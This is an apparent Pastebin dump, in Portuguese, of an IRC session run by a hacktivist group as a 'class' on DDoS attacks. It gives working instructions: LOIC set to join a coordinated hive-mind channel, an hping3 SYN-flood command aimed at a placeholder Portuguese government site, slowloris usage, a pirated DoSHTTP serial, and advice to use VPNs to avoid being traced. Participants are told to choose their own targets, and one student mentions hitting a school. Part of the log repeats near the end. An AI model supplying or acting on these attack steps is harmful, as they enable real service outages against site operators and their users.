Advertisement
Guest User

#AntiSecPT | ATAQUE DDOS (1ª parte)

a guest
Dec 3rd, 2011
3,424
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 58.11 KB | None | 0 0
  1. aula/discussão ATAQUE DDOS (1ª parte) por c0ldc0d3r -
  2. ------------------------------------------------------------------------------------------------------------
  3. Aula Resumida:
  4. ----
  5. Windows
  6. DoSHTTP 2.5.1
  7. DOWNLOAD URL: http://www.socketsoft.net/download/doshttp_setup.exe
  8. SERIAL: dh10a-0064-5612-1234-37b5-9701
  9.  
  10. LOIC (é só correr):
  11. DOWNLOAD URL: http://sourceforge.net/projects/hivemindloic/files/latest/download
  12. Server: irc.freshirc.com
  13. Canal: #lulzsecportugal
  14. Mudar para: FUCKING IRC HIVE MODE
  15.  
  16. ----//-------------//------------
  17.  
  18. Linux:
  19.  
  20. Install: sudo apt-get install hping3
  21. Flood Command: hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
  22. Case of lag: --flood para -i u100
  23.  
  24. ----//------------//-------------
  25.  
  26. Verificar portas: ping.eu/port-chk/
  27. ------------------------------------------------------------------------------------------------------------
  28. Aula Resumida:
  29. ------------------------------------------------------------------------------------------------------------
  30.  
  31. * w4r10ck (webchat@AN-ivc.474.m6tpja.IP) entrou em #aula
  32. * Marmelo (marmelo@lulzsecportugal.com) entrou em #aula
  33. <Marmelo> boas
  34. <c0ldc0d3r> boas
  35. <AntiSecPT278> broas
  36. <AntiSecPT278> xD
  37. <Marmelo> c0ld voz me plss?
  38. <Marmelo> olha que sacrificio
  39. <Marmelo> estava eu a jogar
  40. * c0ldc0d3r oferece voz a Marmelo
  41. <Marmelo> e sai do windows so para vir para aqui
  42. <Marmelo> tas a ver lol
  43. * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
  44. * w4r10ck saiu (Ping timeout: 121 seconds)
  45. * Dagun (webchat@AN-mif.uvq.rloiam.IP) entrou em #aula
  46. * inetking (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
  47. <Dagun> boas
  48. * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  49. * MikeZ (webchat@AN-fs7.uas.g29tu8.IP) entrou em #aula
  50. * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
  51. * bl4ck (webchat@AN-f49.isc.j12pk9.IP) entrou em #aula
  52. * w4r10ck (webchat@AN-vv8.k64.45hl4i.IP) entrou em #aula
  53. * sc0rp (sc0rp@127.0.0.1) entrou em #aula
  54. * joao_ (joao@AN-j69.rhd.6cqjs0.IP) entrou em #aula
  55. * AntiSecPT594 (webchat@AN-3rl.a7v.g29tu8.IP) entrou em #aula
  56. * Made (webchat@AN-q7o.pmt.arjsab.IP) entrou em #aula
  57. * trolololguy_ (trolololguy__@AN-ter.ilk.h3nreq.IP) entrou em #aula
  58. * JojO1z (webchat@AN-gc1.4mh.hqmp6l.IP) entrou em #aula
  59. <c0ldc0d3r> Então pessoal, tudo bem com vocês?
  60. <Marmelo> c0ld é melhor fazeres +m acho que é isso
  61. <c0ldc0d3r> hum?
  62. <Marmelo> eu estou +/-
  63. <c0ldc0d3r> podes ir jogar lol
  64. <wokmaster> could be better
  65. <wokmaster> :)
  66. <Marmelo> tipo estou a dizer para bloquares o chat daqui a um bocado
  67. * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
  68. <c0ldc0d3r> népia
  69. * emptydev (a@emptydev.google.suck.it) entrou em #aula
  70. <c0ldc0d3r> senão como vão tirar dúvidas?
  71. <emptydev> Que cena :o
  72. <Marmelo> a sim por pvt pah
  73. <Marmelo> como ontem
  74. <Marmelo> senao é uma confusao ...
  75. <c0ldc0d3r> pvt o cr** que não vou estar a responder um a um.
  76. <Made> o prof tá atrasado 7 min bora bazar xD
  77. * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
  78. <Marmelo> lol Made
  79. <c0ldc0d3r> Made, hahah
  80. <Made> :D
  81. <mitsai> é aqui
  82. <mitsai> +v
  83. <mitsai> pl
  84. <c0ldc0d3r> Mais uns 2 minutos e começamos.
  85. <Marmelo> mas olha tamos tipo a explicar
  86. <Marmelo> e vai vir um otario a fazer spam
  87. <c0ldc0d3r> leva ban.
  88. <Marmelo> se for como ontem 100+ pessoas
  89. <Marmelo> imagina
  90. <c0ldc0d3r> não vai ser lol
  91. <c0ldc0d3r> irc está tudo mamado
  92. <Marmelo> lol
  93. <Marmelo> isso é bom entao lol
  94. <AntiSecPT278> é neste ou no anonnet.org?
  95. <c0ldc0d3r> é aqui a aula.
  96. <AntiSecPT278> felizmente
  97. <AntiSecPT278> o outro está péssimo
  98. <c0ldc0d3r> ok, vamos dar início.
  99. <w4r10ck> c0ld é que ta bue pessoal no anonnet
  100. <AntiSecPT278> deviam actualizar o twitter com o correcto
  101. <c0ldc0d3r> w4r10ck, tem que ser neste...
  102. <w4r10ck> yah yah tb acho melhor o outro server ta uma lastima
  103. * krak-chevaliers saiu (Ping timeout: 121 seconds)
  104. * tuga (webchat@AN-iuq.ep7.6cqjs0.IP) entrou em #aula
  105. <c0ldc0d3r> vão ser necessárias 2 ferramentas para os ataques DDoS
  106. <c0ldc0d3r> para quem usa window$ claro.
  107. <tuga> a aula já começou á muito? :/
  108. <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
  109. <c0ldc0d3r> tuga, acabou de começar.
  110. <Marmelo> lol ainda nao começou praticamente
  111. <Marmelo> vamos la
  112. <Marmelo> Apartir de agora so podem mandar uma mensagem de cada vez e tem que ser uma questao ou algo importante
  113. <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
  114. <Marmelo> Pergunta : E o GoodBye?
  115. <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
  116. <joao_> e quem tem linux ?
  117. <c0ldc0d3r> Marmelo, goodbye não é muito seguro.. ele crasha a meio do ataque.
  118. <c0ldc0d3r> joao_, já digo para quem tem linux.
  119. * Gunp0wd3rPl0t saiu (Ping timeout: 121 seconds)
  120. <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
  121. * l4m8d4 saiu (*.net *.split)
  122. * wokmaster saiu (*.net *.split)
  123. <c0ldc0d3r> poderão*
  124. <c0ldc0d3r> Agora, para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
  125. * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
  126. <tuga> pergunta: qual é o site que está a ser vitima entao?
  127. <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
  128. <AntiSecPT278> -.-
  129. <c0ldc0d3r> Caso a rede vá abaixo, mudem de --flood para -i u100
  130. <c0ldc0d3r> Dúvidas?
  131. <Marmelo> Sim
  132. <Marmelo> o que queres dizer com rede ?
  133. <c0ldc0d3r> a vossa própria "internet"
  134. <c0ldc0d3r> ou seja, se não conseguirem acessar o google por exemplo, devido ao ataque.
  135. <Marmelo> ok
  136. <c0ldc0d3r> para não estar a sob-carregar a rede, mudam de --flood para -i u100
  137. <c0ldc0d3r> olha depois mete isto tudo no pastebin e dá ao caravela..
  138. <mitsai> --- www.xxxxxxxxx.rcts.pt hping statistic ---
  139. <mitsai> 351986 packets transmitted, 0 packets received, 100% packet loss // Este site nao responde aos pedidos de ping.
  140. <Marmelo> ok ve se me lembras
  141. <Made> Pergunta: Servidores que usam CloudLinux, e a firewall não deixa fazer mais do que 3 requests por segundo essas ferramentas dão?
  142. <sc0rp> o loic sim da
  143. <c0ldc0d3r> Made, humm..
  144. <sc0rp> pois envia a informaçao dentro de uma unica coneção ao envez de criar multiplas ligaçoes
  145. <c0ldc0d3r> isso não serve de muito
  146. * Tsunamy_ (webchat@AN-1ob.9be.j12pk9.IP) entrou em #aula
  147. <c0ldc0d3r> mandar 3 requests por segundo..
  148. <c0ldc0d3r> nem faz muito sentido..
  149. <c0ldc0d3r> porém, poderás usar o slowloris
  150. * wokmaster (rooting@AN-pqc.tda.sh4ali.IP) entrou em #aula
  151. <c0ldc0d3r> http://ha.ckers.org/slowloris/slowloris.pl
  152. <sc0rp> bem era esse que me estava a referir
  153. <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
  154. <Made> não é mandar, a firewall é que não deixa fazer c0ldc0der
  155. <sc0rp> e nao o loic
  156. <c0ldc0d3r> depois é só fazer perl slowloris.pl -dns www.vitima.com -timeout 5
  157. <tuga> <~c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt |||| nao percebi esta parte :S
  158. <sc0rp> peço desculpa
  159. <c0ldc0d3r> tuga, essa parte é só para quem usar linux
  160. <c0ldc0d3r> usas linux?
  161. <tuga> ah ok
  162. <tuga> w vista
  163. <c0ldc0d3r> emt
  164. <tuga> nop
  165. <c0ldc0d3r> então fica-te pelo loic & DoSHTTP 2.5.1
  166. <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
  167. <tuga> sim, o loic ja fiz a cena de conectar, deu-me um IP, o dosHTTP também já registei o serial, mas agora o que faço?
  168. <c0ldc0d3r> emptydev, servidores disponíveis como assim? os da vítima?
  169. <emptydev> Yup.. DNS's...
  170. <Marmelo> Pergunta MUITO importante : Portanto para não saberem o nosso IP verdadeiro , ao usar algum desses programas teremos que usar um vpn ?
  171. * sh4d0wf40 (other@AN-uui.9t0.s1ct8s.IP) entrou em #aula
  172. <c0ldc0d3r> para verificar se o ataque está a causar impacto, é ir ao ping.eu/port-chk/ e colocar o site e a porta 80
  173. * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
  174. <c0ldc0d3r> Marmelo, sim, sempre ajuda mais usar vpn
  175. * Grep (Grep@AN-t3n.nat.sh4ali.IP) entrou em #aula
  176. <sc0rp> bem
  177. <emptydev> c0ldc0d3r, esse site não verifica só se a porta 80 está aberta?
  178. <c0ldc0d3r> sim, que é a porta do site.
  179. <tuga> dúvida: nós é que escolhemos um site qualquer para fazer o que estámos a fazer agora?
  180. <Marmelo> Pergunta : No loic existe algumas opçoes de ataque , que nao me lembro , penso que era HTTP , ...
  181. <c0ldc0d3r> o resto pouco interessa.
  182. <Marmelo> qual a melhor dessas
  183. <sc0rp> fiz um pequeno video de uma ferramenta de synflood, contudo nao derrubei nenhum site de proposito
  184. <c0ldc0d3r> tuga, sim.
  185. * neopunk (neopunk@AN-edd.acp.kbtmgr.IP) entrou em #aula
  186. <c0ldc0d3r> Marmelo, sim, há o http, tcp e o udp
  187. <sc0rp> penso que nao faz mal nenhum verem como se procede um attack
  188. <sc0rp> http://videobam.com/nDOqA
  189. <Marmelo> qual deles sera o melhor?
  190. <c0ldc0d3r> o tcp e o http..
  191. <c0ldc0d3r> porém, se for muita gente, o udp é muito bom.. pois causa impacto na rede toda..
  192. * Desligou (Ligação terminada no destino).
  193. FiSH: Chat in #aula will NOT be encrypted (no key found)
  194. * A conversar em #aula
  195. * ChanServ coloca o modo +q #aula c0ldc0d3r
  196. * ChanServ coloca o modo de operador a c0ldc0d3r
  197. <c0ldc0d3r> peço desculpa
  198. <c0ldc0d3r> tive um problema na rede
  199. <tuga> nao tou a perceber nada disto lol xD
  200. <Marmelo> np
  201. <sc0rp> é um pouco mais simplificado mas nao tem tantas opções
  202. <tuga> na boa
  203. * poptrolha (webchat@AN-j3o.6q6.l7icd1.IP) entrou em #aula
  204. <c0ldc0d3r> tuga, fizeste download das ferramentas?
  205. <sc0rp> wireshark
  206. <sc0rp> *
  207. * Caravela|Lulz (boh@caravela.lulz.pt) entrou em #aula
  208. * ChanServ coloca o modo +q #aula Caravela|Lulz
  209. * ChanServ coloca o modo de operador a Caravela|Lulz
  210. <Marmelo> ah ok entao o wireshark fica mais simples ne?
  211. <tuga> sim
  212. <sc0rp> estava a mudar o portatil de sitio
  213. <Made> DDos? :D
  214. <sc0rp> no
  215. <Marmelo> ok entao
  216. <AntiSecPT278> no wireshark tens filtros
  217. * PATRAOjhN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
  218. <sc0rp> é mais simples para quem entende o trafico e muito melhor para iniciantes, mas o etherape e muito mai facil de usar contudo a informação recebida do servidor nao e a mais detalhada
  219. <sh4d0wf40> pessoal peço desculpa incomudar..mas na outra sala está lá pessoal que queria assistir as aulas mas não dá para falar e avisar o pessoal..só o caravela é que é op
  220. * Caravela|Lulz coloca o modo +m #aula
  221. * ruicruz (ruicruz@AN-tic.j0n.g9g7iv.IP) entrou em #aula
  222. <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
  223. <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
  224. <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
  225. * AntiSecPT407 (webchat@AN-2ha.off.6qn8qq.IP) entrou em #aula
  226. <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
  227. * aula754 (558a3c21@AN-trk.ahu.7j6nol.IP) entrou em #aula
  228. * unkn0wn (unkn0wn@AN-g1c.sni.4imr8a.IP) entrou em #aula
  229. <c0ldc0d3r> para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
  230. <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
  231. <Marmelo> Relembro que usem vpn enquanto fazem isto!
  232. <c0ldc0d3r> Caravela|Lulz, vai colocando isso no pastebin que não estou para repetir mais vezes
  233. <c0ldc0d3r> Caravela|Lulz, colocas-te +m e agora as dúvidas lol?
  234. <Caravela|Lulz> duvidas façam em pvt
  235. <Caravela|Lulz> depois fazes copy paste aqui e respondes
  236. <Caravela|Lulz> para nao haver spam
  237. * kaos (webchat@AN-c5d.qud.arjsab.IP) entrou em #aula
  238. <c0ldc0d3r> pois, mas eu tenho o xchat cheio de redes e não dá-me jeito nenhum
  239. <Marmelo> caravela estava a ir bem
  240. <Caravela|Lulz> ok
  241. * Caravela|Lulz coloca o modo -m #aula
  242. <Marmelo> ok alguma pergunta?
  243. * c0ldc0d3r coloca o modo de operador a mitsai
  244. * c0ldc0d3r oferece voz a mitsai
  245. <Marmelo> Relembro que quem fizer spam leva ban imediato
  246. * jgut (529ab6c4@AN-trk.ahu.7j6nol.IP) entrou em #aula
  247. <tuga> sim
  248. <Caravela|Lulz> faz me um copy paste do log até agora para eu depois guardar em pastebin
  249. <c0ldc0d3r> paste onde?
  250. <tuga> coldcoder, já diz tudo até tu onde disses-te, e agora?
  251. <c0ldc0d3r> piratepad?
  252. <jgut> nights a tds
  253. <c0ldc0d3r> tuga, agora é guardar tudo e amanhã colocarás em ação.
  254. * PATRAOjhN agora chama-se afk_johnnyPATRAODANET
  255. <Marmelo> lol ja acabou a aula?
  256. <sc0rp> lol
  257. * Hikas (5998a3a5@AN-k5k.v7s.hin4td.IP) entrou em #aula
  258. * jpir (webchat@AN-he6.c2p.6om10t.IP) entrou em #aula
  259. <c0ldc0d3r> Marmelo, não há muito à dizer..
  260. <Marmelo> pois nao lol
  261. * jgut saiu (Quit: http://www.mibbit.com ajax IRC Client)
  262. <tuga> amanha? mas escolho um site que eu quiser? tenho de começar a fazer o ataque hoje e deixar a noite toda o pc ligado?
  263. * Kondoriano (marco@AN-6rp.b7j.od2i7s.IP) entrou em #aula
  264. <c0ldc0d3r> agora é saber se o pessoal entendou..
  265. * MaP05 (MaP05@AN-qbn.nlh.vg3fe8.IP) entrou em #aula
  266. <c0ldc0d3r> já vi que alguém conectou o loic ao hive..
  267. <c0ldc0d3r> 2 pessoas
  268. <trolololguy_> uma pergunta
  269. <Made> c0ldc0der tens é de fazer ai uma auma de sqli
  270. <AntiSecPT278> O tuga está com fé de ir dentro
  271. * anarchy (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
  272. <Made> *uma
  273. <Grep> c0ldc0d3r, para linux o LOIC é igual?
  274. <trolololguy_> disseste anteriormente q udp era mais eficaz
  275. <trolololguy_> podes dizer pq?
  276. <Marmelo> LOIC nao da no linux
  277. <trolololguy_> sr professor?
  278. <c0ldc0d3r> Grep, sim
  279. <c0ldc0d3r> é mais complicado
  280. <c0ldc0d3r> mas não recomendo loic para linux..
  281. <c0ldc0d3r> hping3 é mil vezes melhor
  282. <Kondoriano> já começou?
  283. <Marmelo> ah my bad pensava que o loic nao dava para o linux
  284. <mitsai> sim mt melhor
  285. <Grep> ok isso já tenho ;) como vi a falar de ligar a um irc...
  286. <Grep> Marmelo, dar dá... com wine :P
  287. <Marmelo> <trolololguy_> disseste anteriormente q udp era mais eficaz
  288. * Cereal_Killer (webchat@AN-opo.t9n.1tveis.IP) entrou em #aula
  289. <c0ldc0d3r> Caravela|Lulz, onde queres que faça paste do log?
  290. * emptydev- (a@AN-928.r71.7am7ru.IP) entrou em #aula
  291. <emptydev-> Caravela|Lulz
  292. <emptydev-> PVT
  293. * dgrdfg (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
  294. <emptydev-> http://pastebin.com/TfnBWewg
  295. <emptydev-> Vejam
  296. * fx (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
  297. <c0ldc0d3r> emptydev, boa.
  298. * beh (boh@AN-us8.nsn.ovi93d.IP) entrou em #aula
  299. * c0ldc0d3r mudou o tópico para: Aula de hoje resumida: http://pastebin.com/TfnBWewg
  300. <dgrdfg> estava eu dizendo que deveria haver um sitio pra podermos colocar duvidas e que deviamos elaborar uma faq
  301. <dgrdfg> visto que as duvidas são mais que muitas
  302. <c0ldc0d3r> dgrdfg, poderás colocar aqui
  303. <dgrdfg> e muitas questões são constantemente respondidas
  304. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  305. <dgrdfg> tipo sempre o msm
  306. * An0nf40 (other@AN-i37.9oq.2s61dc.IP) entrou em #aula
  307. <beh> bem pensado
  308. * inetking saiu (Ping timeout: 121 seconds)
  309. * fx agora chama-se inetking
  310. <c0ldc0d3r> podem usar este canal para ajuda..
  311. <c0ldc0d3r> é na boa..
  312. <dgrdfg> c0m0 3h k x3 h@k@ u Fb| ?
  313. * jhNNN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
  314. <dgrdfg> por exemplo
  315. <dgrdfg> tenho uma duvida
  316. * emptydev saiu (Ping timeout: 121 seconds)
  317. * MaP05 saiu (Ping timeout: 122 seconds)
  318. * l4m8d4_ (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
  319. <dgrdfg> porque é que com algumas VPN's n consigo aceder a determinados sites
  320. * Funho saiu (Ping timeout: 121 seconds)
  321. <dgrdfg> ou servers
  322. <dgrdfg> e como evitar que isso aconteça
  323. * anarchy saiu (Ping timeout: 121 seconds)
  324. <Grep> c0ldc0d3r, aquele site ping.eu n é melhor o nmap ?
  325. * dgrdfg agora chama-se anarchy
  326. <c0ldc0d3r> isso tem haver com o policy que eles têm contra abusos do serviço..
  327. * AntiSecPT570 (webchat@AN-t76.bhi.3kcki8.IP) entrou em #aula
  328. <tuga> coldcoder, quanto tiveres tempo, se tiveres tempo e se fizeres o favor de me contactar, por favor contacta-me em pvt, obrigado
  329. <c0ldc0d3r> tens que usar outra vpn e de preferência fora da europa.
  330. <Made> amanha há aula?
  331. <anarchy> pois foi o que eu pensei
  332. <anarchy> há que pagar :F
  333. <c0ldc0d3r> Grep, o nmap verifica com o teu ip
  334. * VenusProject saiu (Ping timeout: 121 seconds)
  335. <c0ldc0d3r> o ping.eu não.
  336. <anarchy> mas há vpn's que têm ports fechadas?
  337. <c0ldc0d3r> tuga, ok
  338. * ruicruz saiu (Ping timeout: 127 seconds)
  339. * afk_johnnyPATRAODANET saiu (Ping timeout: 127 seconds)
  340. * kaos saiu (Quit: Page closed)
  341. <Grep> Grep, com o proxychains não, pois não? pelo menos pelo que li :S
  342. * Kondoriano saiu (Ping timeout: 129 seconds)
  343. * aula754 saiu (Ping timeout: 128 seconds)
  344. * sc0rp saiu (Ping timeout: 129 seconds)
  345. <c0ldc0d3r> proxychains poderá resultar...
  346. <c0ldc0d3r> é uma questão de verificar
  347. * w4r10ck saiu (Quit: )
  348. * Hikas saiu (Ping timeout: 132 seconds)
  349. * Caravela|Lulz saiu (Ping timeout: 125 seconds)
  350. * l4m8d4 saiu (Ping timeout: 131 seconds)
  351. * joao_ saiu (Ping timeout: 125 seconds)
  352. * Marmelo saiu (Ping timeout: 122 seconds)
  353. * trolololguy_ saiu (Ping timeout: 129 seconds)
  354. * mitsai saiu (Ping timeout: 125 seconds)
  355. * sh4d0wf40 saiu (Ping timeout: 157 seconds)
  356. * l4m8d4_ agora chama-se l4m8d4
  357. <Grep> tenho feito uns testes, obvio que é mais lento mas tem funcionado... mas é sempre bom haver outras soluções ;) já aprendi kk koisa
  358. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
  359. <emptydev-> Tinhamos ido para a quakenet, tinhamos + gente, e ninguem caia.
  360. <c0ldc0d3r> emptydev-, link.
  361. <c0ldc0d3r> que eu dou ao caravela
  362. <c0ldc0d3r> para por no twitter
  363. <Grep> só uma questão que eu cheguei a meio da aula...
  364. <tuga> c0ldc0d3r, é suposto no LOIC, em baixo em attack status aparecer muitas vezes a dizer failed? pq tenho uns 32.000
  365. <Grep> o hping3 substitui o DoSHTTP e o Loic certo?
  366. <c0ldc0d3r> é, isso significa que o servidor está deixando de responder.
  367. <c0ldc0d3r> Grep, sim.
  368. <An0nf40> tuga tu estás a fazer isso com uma vpn certo?
  369. <tuga> nao lool
  370. <An0nf40> ou estás simplesmente a testar sem nada lol
  371. <c0ldc0d3r> vpn é necessário, visto que somos poucos..
  372. <tuga> mas tipo
  373. <c0ldc0d3r> se fosse tipo 2 mil e tal pessoas a colaborar.. era cagativo usar vpn no meio de tantos ips..
  374. <tuga> eu ponho em perigo outras pessoas?
  375. <c0ldc0d3r> mas como são poucos :\
  376. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  377. <aaaamitsai> +v +o
  378. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
  379. * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
  380. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  381. <tuga> mas eu nao testei num site do governo
  382. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
  383. * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  384. * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
  385. <An0nf40> não precisa ser do governo lol
  386. <mitsai> +v +o pl
  387. * emptydev- saiu (Ping timeout: 121 seconds)
  388. <An0nf40> eles dão mais importancia a esses...
  389. <tuga> sim, mas acho que uma escola eles nao dao importancia o.O xD
  390. <Grep> lol omg
  391. * DaGun (webchat@AN-a0h.8na.8e30u1.IP) entrou em #aula
  392. * An0nf40 agora chama-se sh4d0wf40
  393. <DaGun> boas, vao por a aula de hoje no pastebin?
  394. <tuga> ao desligar o ataque no LOIC o site volta imediatamente online certo?
  395. <DaGun> e que tava com problemas na net e perdi uma parte
  396. <DaGun> :S
  397. <sh4d0wf40> lolol
  398. <DaGun> xD
  399. <tuga> dagun, ja puseram penso eu
  400. <Made> DaGun http://pastebin.com/TfnBWewg]
  401. <DaGun> só?
  402. <c0ldc0d3r> tuga, sim e não.
  403. * LzKotha (webchat@AN-dft.gs0.hkmcdf.IP) entrou em #aula
  404. <c0ldc0d3r> se o impacto for muito grande.. o site poderá ficar off até haver assistência física.
  405. <DaGun> é que eu isso apanhei xD
  406. * MovingForward (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
  407. <tuga> ah ok
  408. <mitsai> +v +o pls
  409. <Made> Ao usar uma vpn, a vnp não fica com os meus dados no log?
  410.  
  411. * w4r10ck (webchat@AN-ivc.474.m6tpja.IP) entrou em #aula
  412. * Marmelo (marmelo@lulzsecportugal.com) entrou em #aula
  413. <Marmelo> boas
  414. <c0ldc0d3r> boas
  415. <AntiSecPT278> broas
  416. <AntiSecPT278> xD
  417. <Marmelo> c0ld voz me plss?
  418. <Marmelo> olha que sacrificio
  419. <Marmelo> estava eu a jogar
  420. * c0ldc0d3r oferece voz a Marmelo
  421. <Marmelo> e sai do windows so para vir para aqui
  422. <Marmelo> tas a ver lol
  423. * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
  424. * w4r10ck saiu (Ping timeout: 121 seconds)
  425. * Dagun (webchat@AN-mif.uvq.rloiam.IP) entrou em #aula
  426. * inetking (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
  427. <Dagun> boas
  428. * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  429. * MikeZ (webchat@AN-fs7.uas.g29tu8.IP) entrou em #aula
  430. * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
  431. * bl4ck (webchat@AN-f49.isc.j12pk9.IP) entrou em #aula
  432. * w4r10ck (webchat@AN-vv8.k64.45hl4i.IP) entrou em #aula
  433. * sc0rp (sc0rp@127.0.0.1) entrou em #aula
  434. * joao_ (joao@AN-j69.rhd.6cqjs0.IP) entrou em #aula
  435. * AntiSecPT594 (webchat@AN-3rl.a7v.g29tu8.IP) entrou em #aula
  436. * Made (webchat@AN-q7o.pmt.arjsab.IP) entrou em #aula
  437. * trolololguy_ (trolololguy__@AN-ter.ilk.h3nreq.IP) entrou em #aula
  438. * JojO1z (webchat@AN-gc1.4mh.hqmp6l.IP) entrou em #aula
  439. <c0ldc0d3r> Então pessoal, tudo bem com vocês?
  440. <Marmelo> c0ld é melhor fazeres +m acho que é isso
  441. <c0ldc0d3r> hum?
  442. <Marmelo> eu estou +/-
  443. <c0ldc0d3r> podes ir jogar lol
  444. <wokmaster> could be better
  445. <wokmaster> :)
  446. <Marmelo> tipo estou a dizer para bloquares o chat daqui a um bocado
  447. * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
  448. <c0ldc0d3r> népia
  449. * emptydev (a@emptydev.google.suck.it) entrou em #aula
  450. <c0ldc0d3r> senão como vão tirar dúvidas?
  451. <emptydev> Que cena :o
  452. <Marmelo> a sim por pvt pah
  453. <Marmelo> como ontem
  454. <Marmelo> senao é uma confusao ...
  455. <c0ldc0d3r> pvt o cr** que não vou estar a responder um a um.
  456. <Made> o prof tá atrasado 7 min bora bazar xD
  457. * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
  458. <Marmelo> lol Made
  459. <c0ldc0d3r> Made, hahah
  460. <Made> :D
  461. <mitsai> é aqui
  462. <mitsai> +v
  463. <mitsai> pl
  464. <c0ldc0d3r> Mais uns 2 minutos e começamos.
  465. <Marmelo> mas olha tamos tipo a explicar
  466. <Marmelo> e vai vir um otario a fazer spam
  467. <c0ldc0d3r> leva ban.
  468. <Marmelo> se for como ontem 100+ pessoas
  469. <Marmelo> imagina
  470. <c0ldc0d3r> não vai ser lol
  471. <c0ldc0d3r> irc está tudo mamado
  472. <Marmelo> lol
  473. <Marmelo> isso é bom entao lol
  474. <AntiSecPT278> é neste ou no anonnet.org?
  475. <c0ldc0d3r> é aqui a aula.
  476. <AntiSecPT278> felizmente
  477. <AntiSecPT278> o outro está péssimo
  478. <c0ldc0d3r> ok, vamos dar início.
  479. <w4r10ck> c0ld é que ta bue pessoal no anonnet
  480. <AntiSecPT278> deviam actualizar o twitter com o correcto
  481. <c0ldc0d3r> w4r10ck, tem que ser neste...
  482. <w4r10ck> yah yah tb acho melhor o outro server ta uma lastima
  483. * krak-chevaliers saiu (Ping timeout: 121 seconds)
  484. * tuga (webchat@AN-iuq.ep7.6cqjs0.IP) entrou em #aula
  485. <c0ldc0d3r> vão ser necessárias 2 ferramentas para os ataques DDoS
  486. <c0ldc0d3r> para quem usa window$ claro.
  487. <tuga> a aula já começou á muito? :/
  488. <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
  489. <c0ldc0d3r> tuga, acabou de começar.
  490. <Marmelo> lol ainda nao começou praticamente
  491. <Marmelo> vamos la
  492. <Marmelo> Apartir de agora so podem mandar uma mensagem de cada vez e tem que ser uma questao ou algo importante
  493. <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
  494. <Marmelo> Pergunta : E o GoodBye?
  495. <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
  496. <joao_> e quem tem linux ?
  497. <c0ldc0d3r> Marmelo, goodbye não é muito seguro.. ele crasha a meio do ataque.
